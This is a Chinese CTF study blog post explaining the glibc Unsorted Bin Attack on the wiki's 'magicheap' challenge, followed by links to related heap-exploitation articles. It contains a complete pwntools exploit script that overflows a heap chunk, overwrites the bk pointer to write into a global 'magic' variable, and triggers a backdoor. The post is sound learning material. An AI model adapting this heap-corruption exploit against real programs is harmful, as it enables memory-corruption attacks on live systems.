从wiki 重新打基础之 Unsorted Bin Attack

最新推荐文章于 2024-07-19 12:05:00 发布
最新推荐文章于 2024-07-19 12:05:00 发布
阅读量409 收藏 1
点赞数 1
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/96484716
版权

之所以 看 Unsorted Bin Attack   因为感觉 Fastbin    还有 UAF算是比较熟悉的  所以 直接看 Unsorted Bin

其实Unsorted Bin 也是比较熟悉的  在泄露 libc库的时候就认真的看过 这个东西

,是当small chunklarge chunkfree掉之后,不会直接进入smallbin或largebin,而是会先进入unsortedbin

然后他是双链表连接的  不同于fastbin的单链表 他还会堆块合并

这里wiki给的例题很简单  简单看一下

维护一个数组  记录我们的 堆地址

发现 edit 直接让我们自己输入大小  所以这里可以 利用一下 而且还有一个后门函数

这里直接 可以直接 利用 unsortbin  然后直接写进入那个magic 的地方   因为 bk 是没有检查的

这里可以gdb 看一下

可以看到直接  搞定了这个东西。。。。

下面就是脚本,

# -*- coding:utf-8 -*-
import os
import base64
from pwn import* 
io=process("./magicheap")
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")


def add(size,content):
	io.recvuntil("Your choice :")
	io.sendline("1")
	io.recvuntil("Size of Heap : ")
	io.sendline(str(size))
	io.recvuntil("Content of heap:")
	io.sendline(content)

def edit(index,size,content):
	io.recvuntil("Your choice :")
	io.sendline("2")
	io.recvuntil("Index :")
	io.sendline(str(index))
	io.recvuntil("Size of Heap : ")
	io.sendline(str(size))
	io.recvuntil("Content of heap : ")
	io.sendline(content)

def dele(index):
	io.recvuntil("Your choice :")
	io.sendline("3")
	io.recvuntil("Index :")
	io.sendline(str(index))


if __name__ =="__main__":
	add(0x20,'a')
	add(0x80,'a')
	add(0x20,'a')
	add(0x20,'a')
	magic=0x6020C0
	dele(1)
	payload='a'*0x20+p64(0)+p64(0x91)+p64(0)+p64(magic-0x10)
	edit(0,len(payload),payload)
	#gdb.attach(io)
	add(0x80,'pppp')

	io.sendline("4869")

	print io.recv()
	io.close()

pipixia233333
关注
专栏目录
CTF pwn题堆入门 -- Unsorted bin
lifanxin的博客
04-08 3252
Unsorted bin概述攻击方式泄露libc地址总结 概述   Unsorted bin也是堆题中常见的,当一个堆块被释放时,且该堆块大小不属于fast binlibc-2.26之后要填满tcache),那么在进入small bin和large bin之前,都是先加入到unsorted bin的。之后当我们再次分配内存到unsorted bin上寻找时,如果申请的内存堆块小于寻找的unsorted bin,那么会将该内存块切割后返回给用户,剩下的仍然保存在unsorted bin上;如果申请的内存堆块
fastbin attack + unsorted bin attack+ heap overflow+ double free fastbin + double free unlink
qq_39869547的博客
10-27 380
0x1 fastbin依靠单链表来组织的,堆管理结构始终维护一个指向最后一个chunk的指针(倒数第二个chunk的fd,通常情况这个fd指向的是下一个chunk起始地址)。这个指针决定了下一次要分配的chunk地址。 也就是说默认分配最好一个chunk给用户使用,同时最后一个chunk也是我们一开始第一个free掉的 0x2 我们的目的修改某一个chunk的fd ,这样我们就可以任意地址分配我们...
Unsorted Bin Attack
qq_45595732的博客
11-26 439
Unsorted Bin Attack Unsorted Bin Attack 被利用的前提 -------------控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效果 -------------实现修改任意地址值为一个较大的数值。 Unsorted bin的来源 1,当一个较大的 chunk 被分割成两半后,如果剩下的部分大于MINSIZE,就会被放到 unsorted bin 中。 2,释放一个不属于 fast bin
unsortedbin attack
最新发布
yjh_fnu_ltn的博客
07-19 945
(因为unsorted_chunks(av)地址本来就知道,不需要用过链尾的p去找它的下一个即fd值),所以即使我们修改了其为一个不合法的值也没有关系。然而,需要注意的是,unsorted bin 链表可能就此破坏,在插入 chunk 时,可能会出现问题。类似于unlink的过程,要将链尾的chunkp,取出来,即 unsorted_chunks(av)->bk = p->bk;我们可以看到,在该链表中必有一个节点(不准确的说,是尾节点,这个就意会一下把,毕竟循环链表实际上没有头尾)的。
13.unsorted_bin_attack
06-09 224
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main(){ 5 fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into...
UnsortedBin Attack
yms0211的博客
09-13 1028
Unsorted Bin Attack
unsort bin attack -攻防世界 noleak
csdn546229768的博客
12-09 723
带着问题的学习是有效的 例题:攻防世界noleak ,这题解法好像有多种但是我是刚接触堆也是抱着学习的姿势学习攻击思路,这里就先例举我看明白的2种方式(爆破(在爆破__malloc_hook文章里面)、unsort bin攻击) 在ida分析后得到以下结果: 总结: 1.用于保存chunk指针的bss数组最多存储10个 2.free时有double free、uaf漏洞 3.可以编辑free chunk数据,有堆溢出漏洞 4.因为程序简单但是因为开了got不可写的措施导致题目有了很多玩法 没有开N
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1583
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
新姿势GET 通过unsorted bin泄露libc地址 与 fastbin double free
哒君的博客
08-01 2052
源文件 GitHub checksec 初步分析 利用方法 用sentence函数分配small bin大小的bin,将其free以后,会归入unsorted bin,而如果只有一个bin的话,其fd与bk都是main_arena + offset,尽管free以后内容会清0,但是search函数中的memcmp却可以通过使v1为\x00来绕过,这样的话就会打印出bin的fb字...
BUUCTF hitcontraining_magicheap[堆]
weixin_45441024的博客
12-28 391
BUUCTF hitcontraining_magicheap[堆](Unsorted bin attack) 我们先来学习一下什么是Unsorted binattack 用ctfwiki里面的例子来进行解释: Unsorted Bin Attack,顾名思义,该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效
好好说话之Unsorted Bin Attack
hollk’s blog
01-15 3857
Unsorted Bin Attack很简单,序言就不多说了,直接看本文讲解就好,抓紧时间把wiki写完,我要去搞IOT固件分析了!!!!
堆漏洞挖掘——unsortedbin attack漏洞
董哥的黑板报
08-13 3247
一、核心思想 实现在任意地址写一个数值 局限性:通常unsortedbin attack只能够在目标地址写一个大数值 unsortedbin attack通常是为了配合fastbin attack而使用的 fastbin attack见文章:https://blog.csdn.net/qq_41453285/article/details/99315504 二、原理图解 当从unsor...
CTF-PWN-house-of-orange (unsortedbin attack+IO_FILE文件结构利用)
SuperGate的博客
02-22 959
程序综述 [*] '/home/supergate/Desktop/Pwn/houseoforange' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled FORTIFY: ...
【PWN】Unsorted bin与Large binAttack
u014377094的博客
05-03 865
今天继续整理攻击方法,逆水行舟,不进则退。 Unsorted bin attack与Large bin attack两者我还是放在一起了,因为两者相近,都是通过修改bk(bk_nextsize)来实现对一块区域的修改,漏洞在于缺少*(bk)->fd的检测。 unsortedbin的利用点 /* remove from unsorted list */ if (__glibc_unlikely (bck->fd != victim))
unsorted bin attack
abelxu
11-17 384
0x01 unsorted bin 基本来源 当一个较大的 chunk 被分割成两半后,如果剩下的部分大于 MINSIZE,就会被放到 unsorted bin 中。 释放一个不属于 fast bin 的 chunk,并且该 chunk 不和 top chunk 紧邻时,该 chunk 会被首先放到 unsorted bin 中。 当进行 malloc_consolidate 时,可能会把合并后的 chunk 放到 unsorted bin 中,如果不是和 top chunk 近邻的话。 基本使用情况
从零开始学howtoheap:理解fastbins的​unsorted bin攻击
weixin_44626085的博客
02-13 999
how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。
houseoforange_hitcon_2016(unsortbin attack,fsop)
m0_51251108的博客
11-15 464
houseoforange_hitcon_2016: 很经典的一道题目,checsec一下,保护全开 程序分析: 这题最主要就是没有free 漏洞分析: edit里的length和add里的length没有联系, 我们可以造成堆溢出 大致思路: 1.释放到unsortbin中,泄露libc_base和heap_addr: 利用堆溢出,改Top_chunk_size为一个较小的值,我们再申请一个大于Top_chunk_size的chunk的话,系统会用sysmalloc来分配堆,如果符合sysmalloc
pwn工具箱之unsorted bin attack
jmp esp
07-03 2803
unsorted bin attack基本信息利用类型:堆利用 堆利用类型:针对unsorted bin的利用,也就是需要用normal chunk或者large chunk释放得到的 利用思想:unsorted bin是一个双链表,在分配时会将unsorted bin中的chunk从unsorted bin中移除,是一个链表的unlink操作。如果能够控制unsorted bin chunk的
fast bin、small bin、unsorted bin large bin的区别与共同点
07-15
快速块(fast bin)、小型块(small bin)、未排序块(unsorted bin)和大型块(large bin)是堆管理中不同的内存块分类。它们有一些区别和共同点,如下所示: 区别: 1. 大小范围:快速块是一组固定大小的小块,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值